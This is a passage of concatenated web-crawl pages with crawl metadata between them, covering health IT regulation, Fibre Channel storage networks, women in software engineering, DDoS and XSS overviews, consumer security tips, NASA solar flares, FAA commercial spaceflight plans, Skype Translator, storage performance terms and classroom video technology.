and Innovation Act, mandated that the FDA, FCC, and ONC deliver a report to Congress by January 2014 outlining their framework for regulating health IT. The agencies convened a work group comprised of experts and industry representatives, which delivered a report in September recommending how the agencies should construct their final report (bureaucracy at its finest). The work group's recommendations echo the FDA's mobile medical app guidance. Members think the agencies should exercise light oversight over simple software and more closely monitor complicated, risky technology, the software that substitutes its judgment for humans' in medical situations. They have a lot of snake oil to look out for. A January study in the journal JAMA Dermatology examined four apps purporting to diagnose skin cancer based on a picture of a mole. The results were poor; the odds of a positive diagnosis being correct ranged from 6.8 percent to 98.1 percent; negative diagnoses similarly varied in accuracy. The authors blamed a "lack of regulatory oversight" for the wide range in quality. Earlier this year, FDA cracked down on the mobile app uChek, which uses an algorithm and the iPhone's camera to perform urinalysis. The app's makers lacked the agency's clearance to market those capabilities, and the technical specifications on their website revealed that the company's data fell short of typical FDA standards. FDA sent them a letter requesting it come into compliance. Similar cases are likely to proliferate now that FDA has announced its approach to regulating this market. The agency said in September that it will allow offenders "reasonable time" to comply before facing the consequences. The agency declined to answer in a Sept. 26 Twitter chat exactly how it would conduct enforcement against mobile apps. The Federal Trade Commission is expected to join the FDA in enforcing rules for mobile apps and health IT generally. The FTC has cracked down on false marketing claims by mobile medical apps in the past; in 2011, the agency pursued action against several "acne cure" apps that led to settlements. Officials from the agency have suggested it may require randomized controlled trials to back up certain medical claims. FDA's guidance on mobile medical apps specifically exempts physicians who tweak apps for their own use from manufacturer requirements, and that separation of developer and practitioner is consistent with the work group's recommendations for health IT. But that underscores part of the difficulty with overseeing the sector: Small, local changes may result in errors—or misuse—that have nothing to do with the developer. That's where local regulators, who are closer to the action, are likely to come in and help determine where something went wrong. Health IT often involves chained-together functions; a piece of software might control a medical device, which feeds data into an electronic health record, which is monitored by another medical device's software, which could affect how a patient is treated. It isn't known how many errors or adverse events are attributable to health IT for the same reason, the agencies' work group said. It's something that needs to change if health IT is to work well. Regulators, even as they recognize the potential in the sector's future, will have to pay close attention to the pitfalls of the present.
<urn:uuid:53b00d3e-c740-4890-95a4-0a2e20869f11>
CC-MAIN-2017-04
http://www.nextgov.com/health/2013/10/health-it-regulators-face-challenges-medical-apps-proliferate/72191/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00492-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961527
1,078
2.515625
3
Definition: Given a set of points in a plane and an integer k ≤ ( n OVER 2 ), find the line between pairs of points which has the kth smallest slope. Note: Adapted from [AS98, page 416]. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 17 December 2004. HTML page formatted Mon Feb 2 13:10:40 2015. Cite this as: Paul E. Black, "slope selection", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/slopeselectn.html
<urn:uuid:aa099d74-f987-49bf-af33-45cb1eb6ce85>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/slopeselectn.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00310-ip-10-171-10-70.ec2.internal.warc.gz
en
0.854911
166
3.109375
3
Fibre Channel solves storage problems A review of storage area network basics and a look at technologies that still need development. Many organizations that have rolled out client-server infrastructures now have multiple islands of computing. While a local area network (LAN) connects each of the islands and its related storage, direct access to that storage is not always possible. Moreover, this type of infrastructure is expensive, inefficient (duplicate resources), and difficult to manage. And it is almost impossible to enforce standard policies. As corporate capacities increase, driven by data-intensive applications such as multi- media, data warehousing, and ERP, the problem only worsens. Organizations are routinely storing terabytes of information in inflexible structures that provide poor security and system reliability; do not scale easily; and perhaps most importantly do not make data freely available when it is needed. At the same time, the SCSI channels that connect servers to storage are nearing the end of their useful lives. Limited distance and device connectivity and a typical maximum bandwidth of 40MBps (with Ultra Wide SCSI) are all technology restraints. The good news is that the storage industry recognizes these problems. A solution is available and is already being adopted for use in mission-critical applications. The enabling technology is Fibre Channel, and the architecture is a storage area network (SAN). Fibre Channel is a gigabit interconnect technology that combines the best features of channels (high speed and reliability, low latency, and the use of SCSI commands) with those of networks (serial data transmission, many addresses, extended distances, shared services, and scalability). It can also operate as a generic transport mechanism. Fibre Channel is defined in a family of ANSI standards and profiles produced by the X3T11 committee. Loops and switched fabrics At its simplest, Fibre Channel provides a point-to-point connection between two nodes. It can also be configured as a loop connecting up to 127 ports, usually through a hub or cascaded hubs and through dual loops for additional fault tolerance. Fibre Channel can also be configured as a switched fabric, in which one or more switches provide multiple one-to-one connections between as many as 16 million nodes. Switched fabrics open the doors to solving today`s storage problems because they enable the development of enterprise SANs. The simplest SAN enables two servers to share the same storage system. In a more effective SAN, two servers can access two storage systems and share backup. While the primary role of each storage system is to support the applications running on one server, the other server can also access this data when needed without using the LAN. Direct communication between the storage systems makes it easy to enhance data movements over the enterprise network such as for disaster recovery and backup/restore purposes. The ideal SAN extends this model across the enterprise, providing access to any data, wherever it is located, to any computer. The only additional element needed when a SAN begins to scale is network management functionality. While this is still an ideal, it is well on its way to becoming reality. Today, a SAN is most easily implemented in a homogeneous environment, in which a single operating system and data structure is already in use. Heterogeneous environments pose a number of difficulties, although a variety of software vendors provide data-sharing capabilities across SANs. Examples include DataDirect Networks, Mercury Computer, MountainGate, and Transoft Networks, which was acquired by Hewlett-Packard earlier this year. (For more information on these software packages, see InfoStor, August Special Report, pp. 14-19.) Regarding the future of data sharing, there are encouraging developments in common file system software. For example, Veritas Software is developing a distributed file system for Windows NT and Unix. This highlights the importance of a common data access method for open systems. Other efforts include work to define a common disk descriptor, which would allow any system to understand the contents of a disk drive, and the development of object-oriented devices to allow better flexibility with data management and storage resources allocation. Although work in these areas has already begun, widespread acceptance may be two or three years away. Also, work is underway to improve the functionality of SANs, including backup tools that don`t use the LAN. A few LAN-free backup software products are available today, from vendors such as Legato and Veritas, but as yet there are no global LAN-free and server-free backup solutions for all open-system and SAN platforms. (For more information on LAN-free backup, see InfoStor, September Special Report, pp. 16-20.) With the addition of tools such as SAN-to-LAN/WAN gateways and associated management modules, the SAN can become a SWAN (storage wide area network) and it can scale up to the answer the needs to large corporations. Again, there are still many challenges that need to be resolved before SWANs will become widely accepted. For example, is ATM, with its concept of "acceptable loss rate," the right choice for a SWAN, or is SONET better? Although SAN equipment vendors have started to deliver some SAN management tools, global network management tools for SANs are still under development, and again there are debates about the most appropriate tools from the existing traditional network management systems. The Storage Networking Industry Association (www.snia.org) is currently working on a SAN management standard (based on the CIM model) to enable management software developers to build standardized applications. Another positive development is the forthcoming arrival of Fibre Channel applications that take advantage of protocols other than SCSI, such as IP today and, later, VI. All this activity and debate is the mark of a healthy development environment. While many of these areas will not be finalized for several months, they are all being designed to build on existing standards. Any standards-compliant Fibre Channel products in use today will continue to be valid in future SANs. Fibre Channel provides a route that allows IT managers to evolve an efficient, scalable, and manageable storage strategy. Fibre Channel can be configured in a loop via hubs, or in a fabric with switches. A SAN enables two servers to access two storage systems and share backup. Vincent Franceschini is product manager of SAN and high-availability solutions at Hitachi Data Systems Europe (www.hds.com./ www.fibrechannel.com) and director of the Fibre Channel Association, Europe.
<urn:uuid:4836e992-05fc-4812-80a3-d376e17ab159>
CC-MAIN-2017-04
http://www.infostor.com/index/articles/display/56903/articles/infostor/volume-3/issue-10/news-analysis-trends/fibre-channel-solves-storage-problems.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00485-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940719
1,340
2.734375
3
It’s no secret or news flash that software development is dominated by men. But there have been some signs recently that women may be closing the software gender gap a bit. For example, half of the recently announced Code for America fellows are women. Also, at the recent Grace Hopper Celebration, a gathering devoted to furthering the interests of women in computing, many tech companies expressed their desire to hire female engineers. So, things are looking up for women developers, yes? Well, maybe not. No matter how you slice it, women are way underrepresented in the world of software development. According to data from the Bureau of Labor Statistics, in 2012 about 22% of computer programmers, software and web developers in the United States were female. That number comes from the Current Population Survey, which is based on interviews with 60,000 households. One female engineer feels that the real number of women working in the field is significantly less than that, and she’s started gathering some numbers that back her up. Tracy Chou is an engineer at Pinterest and she feels that companies may be overstating the number of women engineers they’ve hired (if they report them at all). It’s Chou’s feeling that in order to solve the problem of too few women building software, we first need good metrics to define the magnitude of the problem. As she wrote: "...there’s a bigger goal, to remove gender as the hidden (or sometimes not-so-hidden) discriminant in the tech industry. And we need to work together to make that happen, and it starts with having honest dialogues about how we’re actually doing, as an industry, to encourage women in computing." In an effort to get a more accurate count of women doing software development, last month she created a GitHub project to collect data on how many females are in full-time just writing or architecting software. People are encouraged to submit data for their own companies, or data about any company which they gather through sources such as company websites. The data she’s been collecting for about a month now can be viewed via a Google spreadsheet. Taking a look at them, there are already some interesting findings. Based on data reported for 107 companies, 438 of 3,594 engineers (12%) are females, well below the BLS’s 22% finding, backing up Chou’s theory that the numbers may be inflated. Here are how the some of the more well known companies in Chou’s data rank: Khan Academy: 6 of 24 engineers, 25% Medium: 5 of 21, 24% GoodReads: 5 of 25, 20% Snapchat: 2 of 13, 15% Hootsuite: 6 of 41, 15% Reddit: 2 of 14, 14% Pinterest: 14 of 105, 13% Etsy: 19 of 149 , 13% Quora: 4 of 35, 11% Flipboard: 6 of 60,10% Flickr: 4 of 42, 9.5% Mozilla: 43 of 500, 9% Foursquare: 6 of 85, 7% Dropbox: 9 of 143, 6% GitHub: 10 of 160, 6% Stack Exchange: 0 of 23, 0% 37signals: 0 of 20, 0% Taken at face value, these numbers certainly suggest that women may be even more of a minority in the developer workforce than those government numbers suggest. Of course, as Chou herself notes, these numbers could be subject to bias, based on the motivations of those choosing to report data. But even if the government’s estimate of 22% is the true percentage of software engineers who are female, Chou’s numbers at least tell us which companies are doing a better job of hiring women to build their software. I think this a worthy endeavour - and I particularly like her approach of crowdsourcing (and open sourcing) the data collection. I hope more people submit data so we can all get a better idea of just how many women software engineers are (or aren't) out there. So, if you have data to contribute to the cause, please do! Read more of Phil Johnson's #Tech blog and follow the latest IT news at ITworld. Follow Phil on Twitter at @itwphiljohnson. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:d54fcdda-fc11-420e-9275-8ef33aa2e45f>
CC-MAIN-2017-04
http://www.itworld.com/article/2703070/big-data/female-software-engineers-may-be-even-scarcer-than-thought.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00513-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949356
932
2.515625
3
What are DDoS attacks? In a DDoS (Distributed Denial of Service) attack, a very large number of devices are used to specifically overload a service with a large volume of queries. This overload leads to a web shop or website being no longer available or only responding very slowly. This can become a problem for companies as no further orders can be taken via a web shop and, therefore, no more turnover can be generated. Such overload attacks are offered as a service in underground forums and can be booked by the hour or the day. In this way, attackers try to force the victim into paying a ransom or cause them commercial damage.
<urn:uuid:e1693835-949e-4cc1-96b6-ba4bce78cf48>
CC-MAIN-2017-04
https://www.gdatasoftware.com/news/2016/12/29352-detecting-ddos-attacks-in-good-time?utm_source=feedblitz&utm_medium=FeedBlitzRss&utm_campaign=gdata-news
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00329-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962422
131
2.859375
3
12 Amazing Tech Predictions for the Next Decade Are you prepared for the day that an artificial intelligence (AI) machine will sit on your employer's corporate board? Or for driverless cars to go mainstream? Or for cities to run without traffic lights? Or for humans to function on 3D-printed body organs? If you're not ready, you will have a few years—but just a few—to prepare for the amazing predictions published in a recent report from the World Economic Forum's Global Agenda Council on the Future of Software and Society. The report, "Deep Shift: 21 Ways Software Will Transform Global Society," included predictions from a survey of top leaders and influencers in the IT sector. We're highlighting selected predictions here, covering everything from Internet connectivity to the Internet of things (IoT), data storage and wearable technology. "These changes will impact people around the world," according to a preface in the report from BSA|The Software Alliance President and CEO Victoria Espinel, who is also chair of the World Economic Forum council that produced the report. "Inventions previously seen only in science fiction—such as artificial intelligence, connected devices and 3D printing—will enable us to connect and invent in ways we never have before. Businesses will automate complicated tasks, reduce production costs and reach new markets. Continued growth in Internet access will further accelerate change. In Sub-Saharan Africa and other underdeveloped regions, connectivity has the potential to redefine global trade, lift people out of poverty and topple political regimes. And, for many of us, seemingly simple software innovations will transform our daily routines." More than 800 information and communications technology sector executives and experts took part in the research.
<urn:uuid:b1d58080-2ea2-40a1-af36-c1cf6d573f25>
CC-MAIN-2017-04
http://www.baselinemag.com/innovation/slideshows/12-amazing-tech-predictions-for-the-next-decade.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00237-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92939
343
2.546875
3
National Cyber Security Month, celebrated every October, is history. Did you implement any special awareness activities for your employees? At a minimum, did you require that your employees change their passwords? Check out these facts from the Multi-State Information Sharing and Analysis Center: - During 2010, more than 12 million records were involved in data breaches. - During 2010, cyber attacks on social networks doubled from 2009. - More than 100 million computers are infected with malware. - 32% of teens have experienced online harassment. - 42% of younger children (ages 4-8) have been victims of cyber bullies. Yet, with the increase of online data breaches, cyber attacks, and online harassment, we continue to participate on social networking sites without HTTPS protection, without checking privacy controls on a regular basis, and without performing due diligence on strangers who send us invitations to connect. So what should you do? Here are good ways to protect yourself everyday, not just during Cyber Security Awareness Month: - Use virus protection on your computer. - Don’t open emails when you don’t recognize the sender – and definitely don’t open attachments when you don’t recognize the sender. - Update your software on a regular basis. - If you use a computer or mobile device for purchases, only provide confidential information (personally identifiable information) if the URL has HTTPS security. - Secure your computer, smartphone, and mobile device with a password. - Learn how to disable the geotagging function on your mobile phone so that you don’t share your location unintentionally. - Don’t use your laptop at Wi-Fi locations since your data may be accessible to anyone. - Consider backing up your files to an external hard drive or other media on a regular basis – weekly if possible. And when Cyber Security Awareness Month begins next October, you can take the National Cyber Pledge and promote safe online computing to friends and family. Allan Pratt, an infosec consultant, represents the alignment of marketing, management, and technology. With an MBA Degree and four CompTIA certs in hardware, software, networking, and security, Allan translates tech issues into everyday language that is easily understandable by all business units. Expertise includes installation and maintenance of hardware, software, peripherals, printers, and wireless networking; development and implementation of integration and security plans; project management; and development of technical marketing and web strategies in the IT industry. Follow Allan on Twitter (http://www.twitter.com/Tips4Tech) and on Facebook (http://www.facebook.com/Tips4Tech). Cross-posted from Tips4Tech
<urn:uuid:7febb01a-a4de-4a99-8d46-fc54175d5227>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/17813-Did-You-Take-the-National-Cyber-Pledge-During-October.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00439-ip-10-171-10-70.ec2.internal.warc.gz
en
0.866494
550
2.9375
3
The Fundamental Characteristics of Storage April 8, 2013 13 Comments Latency is a measurement of delay in a system; so in the case of storage it is the time taken to respond to an I/O request. It’s a term which is frequently misused – more on this later – but when found in the context of a storage system’s data sheet it often means the average latency of a single I/O. Latency figures for disk are usually measured in milliseconds; for flash a more common unit of measurement would be microseconds. IOPS (which stands for I/Os Per Second) represents the number of individual I/O operations taking place in a second. IOPS figures can be very useful, but only when you know a little bit about the nature of the I/O such as its size and randomicity. If you look at the data sheet for a storage product you will usually see a Max IOPS figure somewhere, with a footnote indicating the I/O size and nature. Bandwidth (also variously known as throughput) is a measure of data volume over time – in other words, the amount of data that can be pushed or pulled through a system per second. Throughput figures are therefore usually given in units of MB/sec or GB/sec. As the picture suggests, these properties are all related. It’s worth understanding how and why, because you will invariably need all three in the real world. It’s no good buying a storage system which can deliver massive numbers of IOPS, for example, if the latency will be terrible as a result. The throughput is simply a product of the number of IOPS and the I/O size: Throughput = IOPS x I/O size So 2,048 IOPS with an 8k blocksize is (2,048 x 8k) = 16,384 kbytes/sec which is a throughput of 16MB/sec. The latency is also related, although not in such a strict mathematical sense. Simply put, the latency of a storage system will rise as it gets busier. We can measure how busy the system is by looking at either the IOPS or Throughput figures, but throughput unnecessarily introduces the variable of block size so let’s stick with IOPS. We can therefore say that the latency is proportional to the IOPS: Latency ∝ IOPS I like the mathematical symbol in that last line because it makes me feel like I’m writing something intelligent, but to be honest it’s not really accurate. The proportional (∝) symbol suggests a direct relationship, but actually the latency of a system usually increases exponentially as it nears saturation point. We can see this if we plot a graph of latency versus IOPS – a common way of visualising performance characteristics in the storage world. The graph on the right shows the SPC benchmark results for an HP 3PAR disk system (submitted in 2011). See how the response time seems to hit a wall of maximum IOPS? Beyond this point, latency increases rapidly without the number of IOPS increasing. Even though there are only six data points on the graph it’s pretty easy to visualise where the limit of performance for this particular system is. I said earlier that the term Latency is frequently misused – and just to prove it I misused it myself in the last paragraph. The SPC performance graph is actually plotting response time and not latency. These two terms, along with variations of the phrase I/O wait time, are often used interchangeably when they perhaps should not be. According to Wikipedia, “Latency is a measure of time delay experienced in a system“. If your database needs, for example, to read a block from disk then that action requires a certain amount of time. The time taken for the action to complete is the response time. If your user session is subsequently waiting for that I/O before it can continue (a blocking wait) then it experiences I/O wait time which Oracle will chalk up to one of the regular wait events such as db file sequential read. The latency is the amount of time taken until the device is ready to start reading the block, i.e not including the time taken to complete the read. In the disk world this includes things like the seek time (moving the actuator arm to the correct track) and the rotational latency (spinning the platter to the correct sector), both of which are mechanical processes (and therefore slow). When I first began working for a storage vendor I found the intricacies of the terminology confusing – I suppose it’s no different to people entering the database world for the first time. I began to realise that there is often a language barrier in I.T. as people with different technical specialties use different vocabularies to describe the same underlying phenomena. For example, a storage person might say that the array is experiencing “high latency” while the database admin says that there is “high User I/O wait time“. The OS admin might look at the server statistics and comment on the “high levels of IOWAIT“, yet the poor user trying to use the application is only able to describe it as “slow“. At the end of the day, it’s the application and its users that matter most, since without them there would be no need for the infrastructure. So with that in mind, let’s finish off this post by attempting to translate the terms above into the language of applications. Translating Storage Into Application Earlier we defined the three fundamental characteristics of storage. Now let’s attempt to translate them into the language of applications: Latency is about application acceleration. If you are looking to improve user experience, if you want screens on your ERP system to refresh quicker, if you want release notes to come out of the warehouse printer faster… latency is critical. It is extremely important for highly transactional (OLTP) applications which require fast response times. Examples include call centre systems, CRM, trading, e-Business etc where real-time data is critical and the high latency of spinning disk has a direct negative impact on revenue. IOPS is for application scalability. IOPS are required for scaling applications and increasing the workload, which most commonly means one of three things: in the OLTP space, increasing the number of concurrent users; in the data warehouse space increasing the parallelism of batch processes, or in the consolidation / virtualisation space increasing the number of database instances located on a single physical platform (i.e. the density). This last example is becoming ever more important as more and more enterprises consolidate their database estates to save on operational and licensing costs. Bandwidth / Throughput is effectively the amount of data you can push or pull through your system. Obviously that makes it a critical requirement for batch jobs or datawarehouse-type workloads where massive amounts of data need to be processed in order to aggregate and report, or identify trends. Increased bandwidth allows for batch processes to complete in reduced amounts of time or for Extract Transform Load (ETL) jobs to run faster. And every DBA that ever lived at some point had to deal with a batch process that was taking longer and longer until it started to overrun the window in which it was designed to fit… Finally, a warning. As with any language there are subtleties and nuances which get lost in translation. The above “translation” is just a rough guide… the real message is to remember that I/O is driven by applications. Data sheets tell you the maximum performance of a product in ideal conditions, but the reality is that your applications are unique to your organisation so only you will know what they need. If you can understand what your I/O patterns look like using the three terms above, you are halfway to knowing what the best storage solution is for you…
<urn:uuid:03b66936-5e85-42e5-b14c-8c5a799a8fe5>
CC-MAIN-2017-04
https://flashdba.com/2013/04/08/the-fundamental-characteristics-of-storage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00071-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945813
1,644
3.125
3
NASA's sun watching satellite, the Solar Dynamics Observatory got a great shot of a medium-sizd solar flare this week. NASA said the radiation storm and a spectacular coronal mass ejection (CME) mushroomed up and fell back down looking as if it covered an area of almost half the solar surface. More on space: Gigantic changes keep space technology hot From NASA: The SDO observed the flare's peak at 1:41 a.m. EDT. SDO recorded these images in extreme ultraviolet light that show a very large eruption of cool gas. It is somewhat unique because at many places in the eruption there seems to be even cooler material -- at temperatures less than 80,000 K. According to NASA the flare, which NASA classified an M-class burst, will hit the Earth's magnetic field during the late hours of June 8th or June 9th but should cause no more that an increase in auroras in the northern night sky. NASA scientists classify solar flares according to their x-ray brightness in the wavelength range 1 to 8 Angstroms. There are 3 categories: X-class flares are major events that can trigger planet-wide radio blackouts and long-lasting radiation storms. M-class flares are medium-sized; they can cause brief radio blackouts that affect Earth's polar regions. Minor radiation storms sometimes follow M-class flares. Compared to X- and M-class, C-class flares are small with few noticeable consequences on Earth, NASA stated. You may recall an X-class burst emanated from the Sun around Valentine's Day this year and caused quite a stir but ultimately caused no problems. X-class flares are the most powerful of all solar events that can trigger radio blackouts and long-lasting radiation storms. That X class flare came on the heels of a few M-class and several C-class flares over the a few days in February. Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:ef3ff5c9-80b3-4c0c-9ebd-9e6d5ad4dce3>
CC-MAIN-2017-04
http://www.networkworld.com/article/2229429/wireless/nasa-satellite-snaps-pictures-of-massive-solar-blast.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00007-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936952
416
3.28125
3
The FAA this week took a step closer to setting up a central hub for the development of key commercial space transportation technologies such as space launch and traffic management applications and setting orbital safety standards. The hub, known as the Center of Excellence for Commercial Space Transportation would have a $1 million yearly budget and tie together universities, industry players and the government for cost-sharing research and development. The FAA expects the center to be up and running this year. The new center would be an offshoot of other FAA Centers for Excellence that through myriad partnerships develop and set all manner of aviation standards from aircraft noise and emissions to airport systems. According to the FAA the center's purpose is to create a world-class consortium that will identify solutions for existing and anticipated commercial space transportation problems. The FAA expects the center to perform basic and applied research through a variety of analyses, development and prototyping activities. The FAA said the center would have five central areas of work: 1. Space Launch Operations and Traffic Management: Research would include engineering, operations, management, and safety areas of study related to the overall commercial space traffic management systems and its interactions with the civil aviation traffic management systems. The center would look at: on-orbit operations emergency response, ground safety, spaceports, space traffic control and space environment. 2. Launch Vehicle Systems, Payloads, Technologies, and Operations: Here the center would look at launch vehicles, systems and payloads. Specific areas of research include safety management & engineering, flight safety analyses & computation, avionics, propulsion systems, sensors, software, vehicle design and payloads. 3. Commercial Human Space Flight: Research here can provide critical information needed to allow the ordinary citizen -- a person without the benefit of the physical, physiological, and psychological training and exposure to the space environment that the traditional astronaut has -- to travel to space safely, to withstand the extremes of the space environment, and to readjust normally after returning to Earth, the FAA stated. 4. Space Commerce: This category of research encompasses the subcategories of space business and economics, space law, space insurance, space policy, and space regulation. Research will include developing innovative and practical commercial uses of space; innovative business and marketing strategies for companies involved in commercial launch operations and related components and services; support of the US commercial space transportation industry's international perspective and competitiveness; and developing innovative financing for commercial launch activities. 5. Cross-Cutting Research Areas: The idea here is to look for ways to cut the costs of developing the four research topics mentioned above, focusing on safety, testing and training, the FAA stated. As the commercial space industry slowly ramps up there will be a need for such centers, experts say. And there does seem to be growth for the industry. A study last year showed the total investment in that industry has risen by 20% since January 2008, reaching a total of $1.46 billion. The study, done by researchers at the Tauri Group and commissioned by the Commercial Spaceflight Federation said revenues and deposits for commercial human spaceflight services, hardware, and support services has also grown, reaching a total of $261 million for the year 2008. The Federation says that when you combine NASA, other government agencies, and commercial customers, the commercial orbital spaceflight industry is planning over 40 flights to orbit between now and 2014. The study was based on a survey of 22 companies engaged in commercial human spaceflight activities, including Armadillo Aerospace, Masten Space Systems, Scaled Composites, Space Adventures and Space X. The FAA last November streamlined the environmental review part of permit applications for the launch and/or reentry of reusable suborbital rockets to help bolster a fledgling commercial space market. Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:5d6c1a59-bdda-4cf4-9eb2-0e3d6bdbc7fa>
CC-MAIN-2017-04
http://www.networkworld.com/article/2230586/security/faa-close-to-setting-up-commercial-spaceflight-centers.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00007-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928825
781
2.875
3
Star Trek's Universal Translator made real? Microsoft plans to demolish language barriers with Skype Translator, new techology that translates speech in near-real time. Microsoft unveiled a new technology called Skype Translator that may soon eliminate one of the biggest roadblocks in interpersonal communications. On May 27, during the Code Conference in Rancho Palos Verdes, Calif., Microsoft CEO Satya Nadella and Gurdeep Pall, corporate vice president of Skype and Lync, showed how Skype Translator can provide near-real-time translation service. At the heart of the demo is neural net technology from Microsoft Research that enables a feature called "transfer learning." While explaining transfer learning, Nadella said, "What happens is, say, you teach it English. It learns English. Then you teach it Mandarin, it learns Mandarin, but it becomes better at English." Taken a step further, when the system is taught Spanish, it learns Spanish and "gets great at both Mandarin and English," said Nadella. He also admitted that like some of the innermost workings of the brain, the phenomenon is a mystery to Microsoft. "And quite frankly, none of us know exactly why," he said. "It's brain-like in the sense of its capability to learn." Pall then took to the stage to show a pre-beta version of Skype Translator in action. Enlisting the help of a German colleague, Diana Heinrichs, Pall carried on a Skype video call. After a slight pause, Skype Translator delivered both English and German translations of their spoken words via on-screen text and synthesized voice. Despite some minor grammatical errors, the demo went on without a hitch. Later, Pall explained in a blog post how Skype Translator came to be. The technology is the result of "decades of work by the industry, years of work by our researchers, and now is being developed jointly by the Skype and Microsoft Translator teams." The demo delivered "real-time audio translation from English to German and vice versa, combining Skype voice and IM [Instant Messaging] technologies with Microsoft Translator, and neural network-based speech recognition," he said. Like its sci-fi analog, Star Trek's Universal Translator, the tech has the potential to dramatically change communications, Pall said. "Skype Translator opens up so many possibilities to make meaningful connections in ways you never could before in education, diplomacy, multi-lingual families and in business." While Skype's massive reach—300 million connected users per month and more than 2 billion minutes of conversation each day, according to Pall—has broken down communication barriers, language persists as a major hurdle. Calling language barriers "a blocker to productivity and human connection," Pall said, "Skype Translator helps us overcome this barrier." And users won't have to wait for a far-off future to test the tech. "Skype Translator first will be available as a Windows 8 beta app before the end of 2014," Pall said. Skype Translator isn't Microsoft's only effort to remove barriers to communication through technology. Microsoft Research Asia is working on a project, called Kinect Sign Language Translator , that can translate between different spoken and sign languages, also in near-real time.
<urn:uuid:3ae5ea5c-4890-408b-8d31-936e2d613b6a>
CC-MAIN-2017-04
http://www.eweek.com/cloud/microsoft-previews-skype-real-time-translation-tech.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00311-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941789
679
2.53125
3
Cross-site scripting vulnerabilities still top the open-source vulnerability heap, new research has revealed. Cross-site scripting, also known as XSS, allows the attacker to inject malicious client-side scripts into a website, which are later executed by the victims while browsing the website. There are different cross-site scripting variants, all of which can be used to craft different types of attacks. Based on the scanning of almost 400 open source web applications by the Netsparker security scanning engine, XSS accounts for 67% of all the identified vulnerabilities. SQL injection vulnerabilities were a distant second, amounting to 20% of the total. The remaining 13% were made up of remote and local file inclusions, CSRF, remote command execution, command injection, open redirection, HTTP header injection (web server software issue) and frame injection. “Cross-site scripting and SQL injection vulnerabilities have been included in the OWASP Top 10 since the project started, mainly because they are very easy to find and also very easy to exploit,” the researchers noted. “And yet, even after years of raising awareness about these vulnerabilities, the majority of the web applications we use are vulnerable to these types of vulnerabilities.” The report added that while, when dealing with databases, parameterized queries make it very easy to make all the common create, read, update and delete (CRUD) operations safe against SQL injection attacks, XSS is a different animal—and it will continue to take the lion’s share of the vulns. Netsparker argues that, contrary to popular belief, XSS vulnerabilities can be as dangerous as SQL injection. Conventional wisdom says that because the victim is the visitor of the website rather than the actual web application, the web server or the data stored in the database, the damage is contained. In other words, the hacker would only gain access to the specific user’s profile, private messages and forum posts, rather than tamper with the web application itself to steal whole swathes of sensitive data, such as customer details and credit card numbers. But what if the victim of the XSS attack is the forums administrator? An attacker can then work his or her way up to gain root access to main shell servers. “By combining a cross-site scripting attack with social engineering skills hackers can still penetrate networks, hack web servers and steal sensitive data,” the researchers explained.
<urn:uuid:8bb14f3f-4d0d-4990-aa9e-5483fac0d714>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/87-of-opensource-vulns-are-xss-and/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00429-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936744
500
2.65625
3
The integration of new kinds of technology into the classroom has come slowly. Much of this innovation has been driven by bring-your-own-device (BYOD) programs that teachers and students push themselves or integrate into regular learning practices on a class-to-class basis. Those who make use of these innovative solutions have found a broader, more informative world of video communication and other online resources to tap into, all accessible through handheld tools they already own. Engineering and Technology Magazine reported that teachers are finding ways of adding QR codes and online video to everyday teaching practices. The addition of these services is creating a better-informed student body at every level of the academic spectrum, from public school children in lower grades to colleges and university settings. This is still an emerging trend, however, according to the source. The majority of schools still run on textbooks and paper, though many are transitioning to laptops and tablets. Children may soon be able to attend classes via their devices without having to go to a centralized school, but more realistically, emailing assignments and tests will likely be a welcome addition to reducing the amount of cumbersome paperwork that has always been associated with academic institutions. Stretching video communication limitations Schools of all kinds are enjoying greater use of video communication and streaming media than ever before, especially colleges and universities. InformationWeek wrote that these institutions are finding new and diverse ways of integrating video and other media than they did previously, prompting dramatic increases in bandwidth capabilities and boosting other network capabilities to handle the heightened demand. “About 40 percent of your traffic is overhead chatter,” said Jimmy Ray Purser of Cisco. He told InformationWeek that the trick with educational centers that use large numbers of devices and require more connectivity is to harness optimization tools and streamline the media management 